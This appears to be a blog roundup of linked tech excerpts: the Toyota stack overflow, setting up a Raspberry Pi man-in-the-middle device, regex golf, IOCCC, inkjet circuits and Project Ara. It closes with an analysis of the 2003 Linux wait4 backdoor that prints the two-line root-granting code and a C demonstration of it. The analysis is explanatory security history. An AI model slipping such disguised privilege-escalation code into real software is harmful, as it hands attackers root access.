Are We Shooting Ourselves in the Foot with Stack Overflow?

Unless you’ve been living under a rock for the past couple of years, you must have heard of the Toyota unintended acceleration (UA) cases, where Camry and other Toyota vehicles accelerated unexpectedly and some of them managed to kill people and all of them scared the hell out of their drivers.

The recent trial testimony delivered at the Oklahoma trial by an embedded guru Michael Barr for the first time in the history of these trials offers a glimpse into the Toyota throttle control software. In his deposition, Michael explains how a stack overflow could corrupt the critical variables of the operating system (OSEK in this case), because they were located in memory adjacent to the top of the stack. The following two slides from Michael’s testimony explain the memory layout around the stack and why stack overflow was likely in the Toyota code (see the complete set of Michael’s slides).

via Are We Shooting Ourselves in the Foot with Stack Overflow? « State Space.

Setting up a man-in-the-middle device with Raspberry Pi, Part 1

The regular install on a Raspberry Pi is NOOBS (new out-of-box software) and contains several pre-packaged operating systems. However, for the purpose of our MITM device we’ll be using a different Linux distro for our Pi: PwnPi. PwnPi is a distribution of the Raspbian OS that contains many pre-installed packages for security and penetration testing, which is naturally right up our alley. So, go ahead and download PwnPi. Once it’s downloaded we’ll need to load it onto our SD card. First, format your SD card using the SD card formatter from the SD association. If the “size” value shown in the formatter is less than the size of your card, be sure to choose “format size adjustment” in the card.

via Setting up a man-in-the-middle device with Raspberry Pi, Part 1 | jeffq, published.

xkcd 1313: Regex Golf

I found that the hover text, “/bu|[rn]t|[coy]e|[mtg]a|j|iso|n[hl]|[ae]d|lev|sh|[lnd]i|[po]o|ls/ matches the last names of elected US presidents but not their opponents.”, contains a confusing contradiction. There are several last names (like “Nixon”) that denote both elected presidents and opponents. So no regular expression could both match and not match “Nixon”. I could only assume that Randall meant for these names to be winners and not losers (and in fact he later confirmed that was the correct interpretation).

So that got me thinking: can I come up with an algorithm to find a short regex that covers the winners and not the losers?

I started by finding a page that lists winners and losers of US presidential elections through 2000. Adding the 2004-2012 results I get:  …

via xkcd 1313: Regex Golf

Apparently there is a Regex Golf game.

Type a regex in the box. You get ten points per correct match. Hit Enter to go to the next ‘level’.

Who won the 22nd IOCCC

Here are the names and categories for the winners of the 22nd IOCCC:

via Who won the 22nd IOCCC.

IOCCC=International Obfuscated C Code Contest

The source for all the entries should compile and run.  I liked this one: Most catty

horizontal_cat concatenates files horizontally and writes the output to stdout. Each input file is padded with spaces on the right so that the original text alignments are preserved.

Georgia Tech develops inkjet-based circuits at fraction of time and cost

Recent advances in chemically bonding metal particles allowed the researchers to use silver nanoparticle ink to print the circuits and avoid thermal bonding, or sintering, a time-consuming and potentially damaging technique due to the heat. Printing the circuits on resin-coated paper, PET film and glossy photo paper worked best. Researchers also made a list of materials to avoid, such as canvas cloths and magnet sheets.

via Georgia Tech develops inkjet-based circuits at fraction of time and cost.

From: Ink-Jet Printing Custom-Designed Micro Circuits

Initial reports of the technique, which the team demonstrated at a meeting of the Association for Computing Machinery in Zurich Sept. 10, described the result as a “paper computer,” though the best researchers could do was print a WiFi antenna, circuits for an LED and a 3D-printed flashlight. They also produced circuits containing microprocessors and memory-chip connectors that could potentially become components of an actual device, but the printing, ink and materials are still far too basic to allow that, according to Matt Johnson of conductive-ink manufacturer Bare Conductive, who was quoted in a New Scientist story about the demonstration.

Goodbye Sticky. Hello Ara.

The design for Project Ara consists of what we call an endoskeleton (endo) and modules. The endo is the structural frame that holds all the modules in place. A module can be anything, from a new application processor to a new display or keyboard, an extra battery, a pulse oximeter–or something not yet thought of!

via The Official Motorola Blog: Goodbye Sticky. Hello Ara..

The Linux Backdoor Attempt of 2003

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
     retval = -EINVAL;

via The Linux Backdoor Attempt of 2003.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

The check should have been current->uid == 0. Sneaky!
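
The difference between the two quoted lines and the comparison they imitate, as an added user-space example (not code from the kernel or from the linked article). The struct task type and both function names are hypothetical stand-ins; the flag values are the ones in Linux's <linux/wait.h>.

```c
#include <errno.h>
#include <stdio.h>

#ifndef __WALL              /* flag values from Linux's <linux/wait.h> */
#define __WALL   0x40000000
#define __WCLONE 0x80000000
#endif

/* Hypothetical stand-in for the kernel's per-process structure. */
struct task { unsigned int uid; };

/* The two lines quoted above. "=" stores 0 (root) in uid; the assignment
 * evaluates to 0, so the branch is never taken and no error comes back.
 * The extra parentheses around the assignment also keep GCC's
 * -Wparentheses warning quiet, so the line compiles cleanly. */
static int check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The comparison the line pretends to be: uid is read, never written. */
static int check_intended(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

int main(void)
{
    struct task a = { 1000 }, b = { 1000 }, c = { 1000 };
    int ra = check_backdoored(&a, __WCLONE|__WALL);
    int rb = check_intended(&b, __WCLONE|__WALL);
    int rc = check_backdoored(&c, __WALL);  /* && short-circuits here */

    printf("backdoored, both flags: retval=%d uid=%u\n", ra, a.uid);
    printf("intended,   both flags: retval=%d uid=%u\n", rb, b.uid);
    printf("backdoored, one flag:   retval=%d uid=%u\n", rc, c.uid);
    return 0;
}
```

The return value is identical in all three calls, so only a check on the stored uid, or a review rule that flags any assignment inside a condition, tells the two versions apart.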